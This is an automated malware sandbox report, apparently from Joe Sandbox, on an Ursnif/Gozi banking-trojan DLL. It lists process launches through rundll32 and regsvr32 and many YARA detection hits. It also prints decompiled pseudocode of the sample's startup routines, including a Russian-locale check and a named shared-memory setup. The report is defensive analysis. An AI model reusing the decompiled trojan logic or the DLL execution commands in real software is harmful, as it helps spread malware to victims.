00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5520, Parent PID: 4124

General

Target ID:	1
Start time:	00:24:55
Start date:	21/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5080, Parent PID: 4124

General

Target ID:	2
Start time:	00:24:56
Start date:	21/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5216, Parent PID: 4124

General

Target ID:	3
Start time:	00:24:56
Start date:	21/10/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
Imagebase:	0x70000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5020, Parent PID: 5080

General

Target ID:	4
Start time:	00:24:56
Start date:	21/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
Imagebase:	0xaf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 780, Parent PID: 4124

General

Target ID:	5
Start time:	00:24:56
Start date:	21/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
Imagebase:	0xaf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 4124, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	36%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	44.2%
Total number of Nodes:	138
Total number of Limit Nodes:	14

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139
sleepnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E10001000(char _a4) {
				long _v8;
				char _v12;
				char _v36;
				long _t29;
				long _t31;
				long _t32;
				signed short _t34;
				long _t39;
				void* _t45;
				intOrPtr _t47;
				signed int _t54;
				signed int _t55;
				long _t60;
				intOrPtr _t62;
				void* _t67;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t76;
				intOrPtr* _t77;

				_t29 = E1000204A();
				_v8 = _t29;
				if(_t29 != 0) {
					return _t29;
				} else {
					do {
						_t71 = 0;
						_v12 = 0;
						_t60 = 0x30;
						do {
							_t67 = E10001911(_t60);
							if(_t67 == 0) {
								_v8 = 8;
							} else {
								_t54 = NtQuerySystemInformation(8, _t67, _t60,  &_v12); // executed
								_t63 = _t54;
								_t55 = _t54 & 0x0000ffff;
								_v8 = _t55;
								if(_t55 == 4) {
									_t60 = _t60 + 0x30;
								}
								_t72 = 0x13;
								_t10 = _t63 + 1; // 0x1
								_t71 =  *_t67 % _t72 + _t10;
								E100020CA(_t67);
							}
						} while (_v8 != 0);
						_t31 = E10001926(_t71); // executed
						_v8 = _t31;
						Sleep(_t71 << 4); // executed
						_t32 = _v8;
					} while (_t32 == 0x15);
					if(_t32 != 0) {
						L28:
						return _t32;
					}
					_v12 = 0;
					_t34 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
					if(_t34 == 0) {
						__imp__GetSystemDefaultUILanguage();
						_t63 =  &_v12;
						VerLanguageNameA(_t34 & 0xffff,  &_v12, 4);
					}
					if(_v12 == 0x5552) {
						L26:
						_t32 = _v8;
						if(_t32 == 0xffffffff) {
							_t32 = GetLastError();
						}
						goto L28;
					} else {
						if(_a4 != 0) {
							L21:
							_push(0);
							_t76 = E100016C8(E100013BB,  &_v36);
							if(_t76 == 0) {
								_v8 = GetLastError();
							} else {
								_t39 = WaitForSingleObject(_t76, 0xffffffff);
								_v8 = _t39;
								if(_t39 == 0) {
									GetExitCodeThread(_t76,  &_v8);
								}
								CloseHandle(_t76);
							}
							goto L26;
						}
						if(E10001E62(_t63,  &_a4) != 0) {
							 *0x100041b8 = 0;
							goto L21;
						}
						_t62 = _a4;
						_t77 = __imp__GetLongPathNameW;
						_t45 =  *_t77(_t62, 0, 0); // executed
						_t69 = _t45;
						if(_t69 == 0) {
							L19:
							 *0x100041b8 = _t62;
							goto L21;
						}
						_t23 = _t69 + 2; // 0x2
						_t47 = E10001911(_t69 + _t23);
						 *0x100041b8 = _t47;
						if(_t47 == 0) {
							goto L19;
						}
						 *_t77(_t62, _t47, _t69); // executed
						E100020CA(_t62);
						goto L21;
					}
				}
			}

0x10001006
0x1000100b
0x10001010
0x1000117e
0x10001016
0x10001019
0x10001019
0x1000101d
0x10001020
0x10001021
0x10001027
0x1000102b
0x10001062
0x1000102d
0x10001035
0x1000103b
0x1000103d
0x10001042
0x10001048
0x1000104a
0x1000104a
0x10001051
0x10001057
0x10001057
0x1000105b
0x1000105b
0x10001069
0x10001070
0x10001079
0x1000107c
0x10001082
0x10001085
0x1000108e
0x1000117a
0x00000000
0x1000117c
0x100010a1
0x100010a4
0x100010ac
0x100010ae
0x100010b9
0x100010c1
0x100010c1
0x100010cf
0x1000116c
0x1000116c
0x10001172
0x10001174
0x10001174
0x00000000
0x100010d5
0x100010d8
0x10001129
0x10001129
0x10001139
0x1000113d
0x10001169
0x1000113f
0x10001142
0x10001148
0x1000114d
0x10001154
0x10001154
0x1000115b
0x1000115b
0x00000000
0x1000113d
0x100010e5
0x10001123
0x00000000
0x10001123
0x100010e7
0x100010ec
0x100010f3
0x100010f5
0x100010f9
0x1000111b
0x1000111b
0x00000000
0x1000111b
0x100010fb
0x10001100
0x10001105
0x1000110c
0x00000000
0x00000000
0x10001111
0x10001114
0x00000000
0x10001114
0x100010cf

APIs

Part of subcall function 1000204A: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000100B), ref: 10002059
Part of subcall function 1000204A: GetVersion.KERNEL32 ref: 10002068
Part of subcall function 1000204A: GetCurrentProcessId.KERNEL32 ref: 10002084
Part of subcall function 1000204A: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000209D

Part of subcall function 10001911: RtlAllocateHeap.NTDLL(00000000,?,10001027,00000030,747163F0,00000000), ref: 1000191D

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 10001035
Sleep.KERNELBASE(00000000,00000000,00000030,747163F0,00000000), ref: 1000107C
GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004), ref: 100010A4
GetSystemDefaultUILanguage.KERNEL32 ref: 100010AE
VerLanguageNameA.KERNEL32(?,?,00000004), ref: 100010C1
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 100010F3
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 10001111
WaitForSingleObject.KERNEL32(00000000,000000FF,100013BB,?,00000000), ref: 10001142
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001154
CloseHandle.KERNEL32(00000000), ref: 1000115B
GetLastError.KERNEL32(100013BB,?,00000000), ref: 10001163
GetLastError.KERNEL32 ref: 10001174

Strings

@Mqt`fqt MqtTqt, xrefs: 10001163, 10001174

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Name$ErrorLanguageLastLongPathProcessSystem$AllocateCloseCodeCreateCurrentDefaultEventExitHandleHeapInfoInformationLocaleObjectOpenQuerySingleSleepThreadVersionWait
String ID: @Mqt`fqt MqtTqt
API String ID: 1327471650-883350353
Opcode ID: 9276d28bdd02da944a3b474e7d9a5fddd0e7b1c4589ae74f26fa3fe1811e7493
Instruction ID: 003eb65af1a649249ee0b5fc7175b4da7c1afa58490fef881c5e8830d735fbda
Opcode Fuzzy Hash: 9276d28bdd02da944a3b474e7d9a5fddd0e7b1c4589ae74f26fa3fe1811e7493
Instruction Fuzzy Hash: B14180B5901629BAF711DBA4CC99ADF7BBCEF047D0F118126FA41D7188DB74DA408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001C65 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E10001C65(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002230();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x100041c4;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000222A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x100041c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001c65
0x10001c6e
0x10001c72
0x10001c78
0x10001c7d
0x10001c82
0x10001c85
0x10001c88
0x10001c8d
0x10001c8e
0x10001c91
0x10001c9c
0x10001ca3
0x10001ca7
0x10001ca9
0x10001caa
0x10001cad
0x10001cb2
0x10001cbc
0x10001cbe
0x10001cbe
0x10001cd2
0x10001cd8
0x10001cdc
0x10001d2c
0x10001cde
0x10001ce7
0x10001cfd
0x10001d05
0x10001d17
0x10001d1b
0x00000000
0x00000000
0x10001d07
0x10001d0a
0x10001d0f
0x10001d11
0x10001d11
0x10001cf2
0x10001cf4
0x10001d1d
0x10001d1e
0x10001d1e
0x10001ce7
0x10001d34

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001434,0000000A,?,?), ref: 10001C72
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001C88
_snwprintf.NTDLL ref: 10001CAD
CreateFileMappingW.KERNELBASE(000000FF,100041C8,00000004,00000000,?,?), ref: 10001CD2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001434,0000000A,?), ref: 10001CE9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001CFD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001434,0000000A,?), ref: 10001D15
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001434,0000000A), ref: 10001D1E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001434,0000000A,?), ref: 10001D26

Strings

@Mqt`fqt MqtTqt, xrefs: 10001CDE, 10001D26
`RqtAqt, xrefs: 10001C72

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @Mqt`fqt MqtTqt$`RqtAqt
API String ID: 1724014008-2855087876
Opcode ID: 48f9d8df81c6569258c82f2ddb29fb6f0b7b482165551b2003c2a9075682fe7d
Instruction ID: 4deed6341cb5bf801ff5ef2018af7aea945e958e56bc9426a4678b58a0fd0cbc
Opcode Fuzzy Hash: 48f9d8df81c6569258c82f2ddb29fb6f0b7b482165551b2003c2a9075682fe7d
